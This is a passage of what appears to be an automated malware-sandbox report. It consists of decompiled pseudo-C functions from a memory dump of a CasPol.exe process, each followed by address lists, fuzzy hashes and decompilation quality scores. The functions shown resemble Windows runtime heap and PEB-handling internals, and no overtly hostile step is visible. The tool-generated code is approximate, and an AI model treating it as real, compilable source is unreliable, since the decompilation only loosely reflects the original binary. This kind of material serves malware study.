                                                                                                                                                                                                                                                                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t43 = 0x7ffe0386;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if( *_t43 != 0) {
                                                                                                                                                                                                                                                                                                						_t43 = E017F8D34(_v8, _t80);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					E01742280(_t43, _t82);
                                                                                                                                                                                                                                                                                                					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                                                                                                                                                                                                                                                						L0173FFB0(_t62, _t80, _t82);
                                                                                                                                                                                                                                                                                                						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                                                                                                                                                                                                                                                						_t30 = _t80 + 0xd0; // 0xd0
                                                                                                                                                                                                                                                                                                						_t83 = _t30;
                                                                                                                                                                                                                                                                                                						E017F8833(_t83,  &_v16);
                                                                                                                                                                                                                                                                                                						_t81 = _t80 + 0x90;
                                                                                                                                                                                                                                                                                                						L0173FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                                                                                                                                                                                                                                                						_t63 = 0;
                                                                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                                                                						_push(_t83);
                                                                                                                                                                                                                                                                                                						_t48 = E0176B180();
                                                                                                                                                                                                                                                                                                						if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                							E01742280(_t48, _t81);
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t69 = _v8;
                                                                                                                                                                                                                                                                                                						_t12 = _t80 + 0x98; // 0x98
                                                                                                                                                                                                                                                                                                						_t13 = _t69 + 0xc; // 0x575651ff
                                                                                                                                                                                                                                                                                                						E0174BB2D(_t13, _t12);
                                                                                                                                                                                                                                                                                                						_t71 = _v8;
                                                                                                                                                                                                                                                                                                						_t15 = _t80 + 0xb0; // 0xb0
                                                                                                                                                                                                                                                                                                						_t16 = _t71 + 8; // 0x8b000cc2
                                                                                                                                                                                                                                                                                                						E0174BB2D(_t16, _t15);
                                                                                                                                                                                                                                                                                                						E0174B944(_v8, _t62);
                                                                                                                                                                                                                                                                                                						 *((char*)(_t80 + 0xdc)) = 0;
                                                                                                                                                                                                                                                                                                						L0173FFB0(0, _t80, _t82);
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                                                                                                                                                                                                                                                						 *(_t80 + 0xde) = 0;
                                                                                                                                                                                                                                                                                                						if(_a4 == 0) {
                                                                                                                                                                                                                                                                                                							_t25 = _t80 + 0x90; // 0x90
                                                                                                                                                                                                                                                                                                							L0173FFB0(0, _t80, _t25);
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t63 = 1;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					return _t63;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                                                                                                                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                                					_t24 = _t80 + 0x90; // 0x90
                                                                                                                                                                                                                                                                                                					L0173FFB0(0, __ecx, _t24);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                                                                                                                                                                                • Instruction ID: e49abaaca84583822fe6626d0aa85487633ab8de70bd74d8885591f4b141c711
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD3178B2B06587BFDB06EBB4C484BE9FB54BF52200F04415AD51C87306DB34AA49DBE1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                                                                			E017A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				char _v588;
                                                                                                                                                                                                                                                                                                				intOrPtr _v592;
                                                                                                                                                                                                                                                                                                				intOrPtr _v596;
                                                                                                                                                                                                                                                                                                				signed short* _v600;
                                                                                                                                                                                                                                                                                                				char _v604;
                                                                                                                                                                                                                                                                                                				short _v606;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				signed short* _t55;
                                                                                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                                                                                				signed short* _t58;
                                                                                                                                                                                                                                                                                                				signed char* _t61;
                                                                                                                                                                                                                                                                                                				char* _t68;
                                                                                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                                                                                				signed int _t75;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t64 = __edx;
                                                                                                                                                                                                                                                                                                				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                                                                                                                                                                                                                                                				_t55 = _a16;
                                                                                                                                                                                                                                                                                                				_v606 = __ecx;
                                                                                                                                                                                                                                                                                                				_t71 = 0;
                                                                                                                                                                                                                                                                                                				_t58 = _a12;
                                                                                                                                                                                                                                                                                                				_v596 = __edx;
                                                                                                                                                                                                                                                                                                				_v600 = _t58;
                                                                                                                                                                                                                                                                                                				_t68 =  &_v588;
                                                                                                                                                                                                                                                                                                				if(_t58 != 0) {
                                                                                                                                                                                                                                                                                                					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                                                                                                                                                                                                                                                					if(_t55 != 0) {
                                                                                                                                                                                                                                                                                                						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t8 = _t71 + 0x2a; // 0x28
                                                                                                                                                                                                                                                                                                				_t33 = _t8;
                                                                                                                                                                                                                                                                                                				_v592 = _t8;
                                                                                                                                                                                                                                                                                                				if(_t71 <= 0x214) {
                                                                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                                                                					 *((short*)(_t68 + 6)) = _v606;
                                                                                                                                                                                                                                                                                                					if(_t64 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                						asm("cdq");
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                                                                                                                                                                                                                                                						 *((char*)(_t68 + 0x28)) = _a4;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                                                                                                                                                                                                                                                						 *((char*)(_t68 + 0x29)) = _a8;
                                                                                                                                                                                                                                                                                                						if(_t71 != 0) {
                                                                                                                                                                                                                                                                                                							_t22 = _t68 + 0x2a; // 0x2a
                                                                                                                                                                                                                                                                                                							_t64 = _t22;
                                                                                                                                                                                                                                                                                                							E017A6B4C(_t58, _t22, _t71,  &_v604);
                                                                                                                                                                                                                                                                                                							if(_t55 != 0) {
                                                                                                                                                                                                                                                                                                								_t25 = _v604 + 0x2a; // 0x2a
                                                                                                                                                                                                                                                                                                								_t64 = _t25 + _t68;
                                                                                                                                                                                                                                                                                                								E017A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							if(E01747D50() == 0) {
                                                                                                                                                                                                                                                                                                								_t61 = 0x7ffe0384;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_push(_t68);
                                                                                                                                                                                                                                                                                                							_push(_v592 + 0xffffffe0);
                                                                                                                                                                                                                                                                                                							_push(0x402);
                                                                                                                                                                                                                                                                                                							_push( *_t61 & 0x000000ff);
                                                                                                                                                                                                                                                                                                							E01769AE0();
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t35 =  &_v588;
                                                                                                                                                                                                                                                                                                					if( &_v588 != _t68) {
                                                                                                                                                                                                                                                                                                						_t35 = L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					L16:
                                                                                                                                                                                                                                                                                                					_pop(_t69);
                                                                                                                                                                                                                                                                                                					_pop(_t72);
                                                                                                                                                                                                                                                                                                					_pop(_t56);
                                                                                                                                                                                                                                                                                                					return L0176B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t68 = L01744620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                                                                                                                                                                                                                                                				if(_t68 == 0) {
                                                                                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t58 = _v600;
                                                                                                                                                                                                                                                                                                					_t64 = _v596;
                                                                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}






















                                                                                                                                                                                                                                                                                                0x017a7064
                                                                                                                                                                                                                                                                                                0x017a7064
                                                                                                                                                                                                                                                                                                0x017a7067
                                                                                                                                                                                                                                                                                                0x017a7071
                                                                                                                                                                                                                                                                                                0x017a7096
                                                                                                                                                                                                                                                                                                0x017a709b
                                                                                                                                                                                                                                                                                                0x017a70a2
                                                                                                                                                                                                                                                                                                0x017a70a6
                                                                                                                                                                                                                                                                                                0x017a70a7
                                                                                                                                                                                                                                                                                                0x017a70ad
                                                                                                                                                                                                                                                                                                0x017a70b3
                                                                                                                                                                                                                                                                                                0x017a70b6
                                                                                                                                                                                                                                                                                                0x017a70bb
                                                                                                                                                                                                                                                                                                0x017a70c3
                                                                                                                                                                                                                                                                                                0x017a70c3
                                                                                                                                                                                                                                                                                                0x017a70c6
                                                                                                                                                                                                                                                                                                0x017a70cd
                                                                                                                                                                                                                                                                                                0x017a70dd
                                                                                                                                                                                                                                                                                                0x017a70e0
                                                                                                                                                                                                                                                                                                0x017a70e2
                                                                                                                                                                                                                                                                                                0x017a70e2
                                                                                                                                                                                                                                                                                                0x017a70ee
                                                                                                                                                                                                                                                                                                0x017a7101
                                                                                                                                                                                                                                                                                                0x017a70f0
                                                                                                                                                                                                                                                                                                0x017a70f9
                                                                                                                                                                                                                                                                                                0x017a70f9
                                                                                                                                                                                                                                                                                                0x017a710a
                                                                                                                                                                                                                                                                                                0x017a710e
                                                                                                                                                                                                                                                                                                0x017a7112
                                                                                                                                                                                                                                                                                                0x017a7117
                                                                                                                                                                                                                                                                                                0x017a7118
                                                                                                                                                                                                                                                                                                0x017a7118
                                                                                                                                                                                                                                                                                                0x017a70bb
                                                                                                                                                                                                                                                                                                0x017a711d
                                                                                                                                                                                                                                                                                                0x017a7123
                                                                                                                                                                                                                                                                                                0x017a7131
                                                                                                                                                                                                                                                                                                0x017a7131
                                                                                                                                                                                                                                                                                                0x017a7136
                                                                                                                                                                                                                                                                                                0x017a713d
                                                                                                                                                                                                                                                                                                0x017a713e
                                                                                                                                                                                                                                                                                                0x017a713f
                                                                                                                                                                                                                                                                                                0x017a714a
                                                                                                                                                                                                                                                                                                0x017a714a
                                                                                                                                                                                                                                                                                                0x017a7084
                                                                                                                                                                                                                                                                                                0x017a7088
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a708e
                                                                                                                                                                                                                                                                                                0x017a708e
                                                                                                                                                                                                                                                                                                0x017a7092
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a7092

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 78b719c020cfee1818b570cbdc9dc178f16c313a8490e8cb3150ffa0c9792bea
                                                                                                                                                                                                                                                                                                • Instruction ID: 6968af2f69109025f6f825f3a5273027241149ff5d9ffb78431d4da4cfc0b717
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78b719c020cfee1818b570cbdc9dc178f16c313a8490e8cb3150ffa0c9792bea
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9731BF726047919BC324DF28C844A6BF7E9BFC8700F444A29F99587694E731E904CBA6
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                                			E017561A0(signed int* __ecx) {
                                                                                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                                                                                				intOrPtr* _v16;
                                                                                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                				intOrPtr _t37;
                                                                                                                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                                                                                				signed int* _t61;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t64;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t61 = __ecx;
                                                                                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                                                                                                                                                                                                                                				_v16 = __ecx;
                                                                                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                                                                                				if(_t30 == 0) {
                                                                                                                                                                                                                                                                                                					L6:
		_t31 = 0;
		L7:
		return _t31;
	}
	_t32 = _t30 + 0x5d8;
	if(_t32 == 0) {
		goto L6;
	}
	_t59 = _t32 + 0x30;
	if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
		goto L6;
	}
	if(__ecx != 0) {
		 *((intOrPtr*)(__ecx)) = 0;
		 *((intOrPtr*)(__ecx + 4)) = 0;
	}
	if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
		_t51 =  *(_t32 + 0x10);
		_t33 = _t32 + 0x10;
		_v20 = _t33;
		_t54 =  *(_t33 + 4);
		if((_t51 | _t54) == 0) {
			_t37 = L01755E50(0x17067cc, 0, 0,  &_v12);
			if(_t37 != 0) {
				goto L6;
			}
			_t52 = _v8;
			asm("lock cmpxchg8b [esi]");
			_t64 = _v16;
			_t49 = _t37;
			_v20 = 0;
			if(_t37 == 0) {
				if(_t64 != 0) {
					 *_t64 = _v12;
					 *((intOrPtr*)(_t64 + 4)) = _t52;
				}
				E017F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
				_t31 = 1;
				goto L7;
			}
			L0172F7C0(_t52, _v12, _t52, 0);
			if(_t64 != 0) {
				 *_t64 = _t49;
				 *((intOrPtr*)(_t64 + 4)) = _v20;
			}
			L12:
			_t31 = 1;
			goto L7;
		}
		if(_t61 != 0) {
			 *_t61 = _t51;
			_t61[1] = _t54;
		}
		goto L12;
	} else {
		goto L6;
	}
}



















                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000

Memory Dump Source
• Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41ef44640cbc1ec26960e0c5832df524206549f4397a46dd8e27b5ae3d44a8bf
• Instruction ID: b30e37d06d1f3b6cae89df6f7879af517a19e463b5d469831c7a2af4ac2f94f0
• Opcode Fuzzy Hash: 41ef44640cbc1ec26960e0c5832df524206549f4397a46dd8e27b5ae3d44a8bf
• Instruction Fuzzy Hash: 2C3159716197018FE764CF1DC840B26FBE4BB88B10F45496DFA989B351E7B0E804CBA1
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 95%
E0172AA16(signed short* __ecx) {
    signed int _v8;
    intOrPtr _v12;
    signed short _v16;
    intOrPtr _v20;
    signed short _v24;
    signed short _v28;
    void* _v32;
    void* __ebx;
    void* __edi;
    void* __esi;
    intOrPtr _t25;
    signed short _t38;
    signed short* _t42;
    signed int _t44;
    signed short* _t52;
    signed short _t53;
    signed int _t54;

    _v8 =  *0x181d360 ^ _t54;
    _t42 = __ecx;
    _t44 =  *__ecx & 0x0000ffff;
    _t52 =  &(__ecx[2]);
    _t51 = _t44 + 2;
    if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
        L4:
        _t25 =  *0x1817b9c; // 0x0
        _t53 = L01744620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
        __eflags = _t53;
        if(_t53 == 0) {
            L3:
            return L0176B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
        } else {
            E0176F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
             *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
            L2:
            _t51 = 4;
            if(L01736C59(_t53, _t51, _t58) != 0) {
                _t28 = L01755E50(0x170c338, 0, 0,  &_v32);
                __eflags = _t28;
                if(_t28 == 0) {
                    _t38 = ( *_t42 & 0x0000ffff) + 2;
                    __eflags = _t38;
                    _v24 = _t53;
                    _v16 = _t38;
                    _v20 = 0;
                    _v12 = 0;
                    E0175B230(_v32, _v28, 0x170c2d8, 1,  &_v24);
                    _t28 = L0172F7A0(_v32, _v28);
                }
                __eflags = _t53 -  *_t52;
                if(_t53 !=  *_t52) {
                    _t28 = L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                }
            }
            goto L3;
        }
    }
    _t53 =  *_t52;
    _t44 = _t44 >> 1;
    _t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
    if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
        goto L4;
    }
    goto L2;
}




















                                                                                                                                                                                                                                                                                                0x0172aa5e
                                                                                                                                                                                                                                                                                                0x017844a8
                                                                                                                                                                                                                                                                                                0x017844ad
                                                                                                                                                                                                                                                                                                0x017844af
                                                                                                                                                                                                                                                                                                0x017844b6
                                                                                                                                                                                                                                                                                                0x017844b6
                                                                                                                                                                                                                                                                                                0x017844b9
                                                                                                                                                                                                                                                                                                0x017844bc
                                                                                                                                                                                                                                                                                                0x017844cd
                                                                                                                                                                                                                                                                                                0x017844d3
                                                                                                                                                                                                                                                                                                0x017844d6
                                                                                                                                                                                                                                                                                                0x017844e1
                                                                                                                                                                                                                                                                                                0x017844e1
                                                                                                                                                                                                                                                                                                0x017844e6
                                                                                                                                                                                                                                                                                                0x017844e8
                                                                                                                                                                                                                                                                                                0x017844fb
                                                                                                                                                                                                                                                                                                0x017844fb
                                                                                                                                                                                                                                                                                                0x017844e8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0172aa5e
                                                                                                                                                                                                                                                                                                0x01784476
                                                                                                                                                                                                                                                                                                0x0172aa42
                                                                                                                                                                                                                                                                                                0x0172aa46
                                                                                                                                                                                                                                                                                                0x0172aa48
                                                                                                                                                                                                                                                                                                0x0172aa4c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 262a95f6951970ad6a1b2a2ee08848fab84e33c7c0fb8b95c2b994f23ba03fce
                                                                                                                                                                                                                                                                                                • Instruction ID: 1e2be5f3181bb31171257b8764bae059bf2d8b1fcfd84cc2a2b2072d05cd6f4a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 262a95f6951970ad6a1b2a2ee08848fab84e33c7c0fb8b95c2b994f23ba03fce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8231C3B2A0022AABCF11AF69CD41A7FF7B9FF14700B014469F905E7254E774AA11DBA1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                                                                			E01729100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                                                                				signed int _t56;
                                                                                                                                                                                                                                                                                                				signed int* _t60;
                                                                                                                                                                                                                                                                                                				signed int _t63;
                                                                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                                                                                                                				void* _t79;
                                                                                                                                                                                                                                                                                                				signed int _t80;
                                                                                                                                                                                                                                                                                                				intOrPtr _t82;
                                                                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                                                                				void* _t88;
                                                                                                                                                                                                                                                                                                				void* _t89;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t84 = __esi;
                                                                                                                                                                                                                                                                                                				_t70 = __ecx;
                                                                                                                                                                                                                                                                                                				_t68 = __ebx;
                                                                                                                                                                                                                                                                                                				_push(0x2c);
                                                                                                                                                                                                                                                                                                				_push(0x17ff6e8);
                                                                                                                                                                                                                                                                                                				E0177D0E8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                                				 *((char*)(_t85 - 0x1d)) = 0;
                                                                                                                                                                                                                                                                                                				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                                                                                                                                                                                                                				if(_t82 == 0) {
                                                                                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                                                                                					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                                                                                                                                                                                                                                                						E017F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                                                                					return E0177D130(_t68, _t82, _t84);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t88 = _t82 -  *0x18186c0; // 0x11607b0
                                                                                                                                                                                                                                                                                                				if(_t88 == 0) {
                                                                                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t89 = _t82 -  *0x18186b8; // 0x0
                                                                                                                                                                                                                                                                                                				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					E01742280(_t82 + 0xe0, _t82 + 0xe0);
                                                                                                                                                                                                                                                                                                					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                                					__eflags =  *((char*)(_t82 + 0xe5));
                                                                                                                                                                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                						E017F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						__eflags =  *((char*)(_t82 + 0xe4));
                                                                                                                                                                                                                                                                                                						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                                                                                                                                                                                                                                                							 *((char*)(_t82 + 0xe4)) = 1;
                                                                                                                                                                                                                                                                                                							_push(_t82);
                                                                                                                                                                                                                                                                                                							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                                                                                                                                                                                                                                                							L0176AFD0();
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                                                                							_t60 = _t82 + 8;
                                                                                                                                                                                                                                                                                                							 *(_t85 - 0x2c) = _t60;
                                                                                                                                                                                                                                                                                                							_t68 =  *_t60;
                                                                                                                                                                                                                                                                                                							_t80 = _t60[1];
                                                                                                                                                                                                                                                                                                							 *(_t85 - 0x28) = _t68;
                                                                                                                                                                                                                                                                                                							 *(_t85 - 0x24) = _t80;
                                                                                                                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                                                                                								__eflags = _t80;
                                                                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t84 = _t68;
                                                                                                                                                                                                                                                                                                								 *(_t85 - 0x30) = _t80;
                                                                                                                                                                                                                                                                                                								 *(_t85 - 0x24) = _t80 - 1;
                                                                                                                                                                                                                                                                                                								asm("lock cmpxchg8b [edi]");
                                                                                                                                                                                                                                                                                                								_t68 = _t84;
                                                                                                                                                                                                                                                                                                								 *(_t85 - 0x28) = _t68;
                                                                                                                                                                                                                                                                                                								 *(_t85 - 0x24) = _t80;
                                                                                                                                                                                                                                                                                                								__eflags = _t68 - _t84;
                                                                                                                                                                                                                                                                                                								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                                                                                                                                                                                                                								if(_t68 != _t84) {
                                                                                                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								__eflags = _t80 -  *(_t85 - 0x30);
                                                                                                                                                                                                                                                                                                								if(_t80 !=  *(_t85 - 0x30)) {
                                                                                                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								__eflags = _t80;
                                                                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t63 = 0;
                                                                                                                                                                                                                                                                                                								 *(_t85 - 0x34) = 0;
                                                                                                                                                                                                                                                                                                								_t84 = 0;
                                                                                                                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                                                                                                                									 *(_t85 - 0x3c) = _t84;
                                                                                                                                                                                                                                                                                                									__eflags = _t84 - 3;
                                                                                                                                                                                                                                                                                                									if(_t84 >= 3) {
